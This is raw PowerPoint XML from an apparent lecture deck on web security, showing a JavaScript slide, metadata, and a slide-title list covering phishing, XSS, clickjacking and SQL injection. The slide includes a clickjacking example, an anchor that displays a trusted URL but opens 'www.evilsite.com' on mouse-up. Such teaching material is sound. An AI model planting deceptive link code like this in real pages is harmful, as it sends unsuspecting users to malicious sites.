              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript:hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built-in functions can change content of window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>brown.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click-jacking attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onMouseUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> )" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.trustedsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/"&gt;Trust me!&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{90696C2E-113D-8F4F-97AA-4895F71B68EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="760739692"/>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TotalTime>
  <Words>4018</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>530</Paragraphs>
  <Slides>49</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Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>ModernPortfolio</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 7: roadmap</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Phishing Example</vt:lpstr>
      <vt:lpstr>URL Obfuscation</vt:lpstr>
      <vt:lpstr>IE Image Crash </vt:lpstr>
      <vt:lpstr>Confidentiality </vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>ActiveX vs. Java </vt:lpstr>
      <vt:lpstr>Embedding an ActiveX Control </vt:lpstr>
      <vt:lpstr>Authenticode in ActiveX </vt:lpstr>
      <vt:lpstr>Trusted/Untrusted ActiveX controls </vt:lpstr>
      <vt:lpstr>Classic ActiveX Exploits </vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>More on Cookies </vt:lpstr>
      <vt:lpstr>Taking Care of Your Cookies </vt:lpstr>
      <vt:lpstr>Chapter 7: roadmap</vt:lpstr>
      <vt:lpstr>Mobile Code</vt:lpstr>
      <vt:lpstr>Drive-By-Downloads</vt:lpstr>
      <vt:lpstr>Clickjacking </vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser</vt:lpstr>
      <vt:lpstr>Keystroke Logger</vt:lpstr>
      <vt:lpstr>Page-in-the-Middle</vt:lpstr>
      <vt:lpstr>Program Download Substitution</vt:lpstr>
      <vt:lpstr>User-in-the-Middle</vt:lpstr>
      <vt:lpstr>Successful Authentication</vt:lpstr>
      <vt:lpstr>Fake Website</vt:lpstr>
      <vt:lpstr>Fake Code</vt:lpstr>
      <vt:lpstr>Tracking Bug</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Drive-By Download</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) </vt:lpstr>
      <vt:lpstr>XSS Example </vt:lpstr>
      <vt:lpstr>Cookie Stealing XSS Attacks </vt:lpstr>
      <vt:lpstr>Another XSS Attack </vt:lpstr>
      <vt:lpstr>Client-side XSS defenses </vt:lpstr>
      <vt:lpstr>Chapter 7: roadmap</vt:lpstr>
      <vt:lpstr>Dot-Dot-Slash</vt:lpstr>
      <vt:lpstr>Server-Side Include (SSI)</vt:lpstr>
      <vt:lpstr>SQL Injection Attack </vt:lpstr>
      <vt:lpstr>SQL: Standard Query Language </vt:lpstr>
      <vt:lpstr>SQL Syntax </vt:lpstr>
      <vt:lpstr>SQL Syntax </vt:lpstr>
      <vt:lpstr>Login Authentication Query </vt:lpstr>
      <vt:lpstr>Some improvements ... </vt:lpstr>
      <vt:lpstr>Correct Solution </vt:lpstr>
      <vt:lpstr>Questions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42</cp:revision>
  <cp:lastPrinted>2016-09-24T02:18:06Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-26T04:19:59Z</dcterms:modified>
</cp:coreProperties>
</file>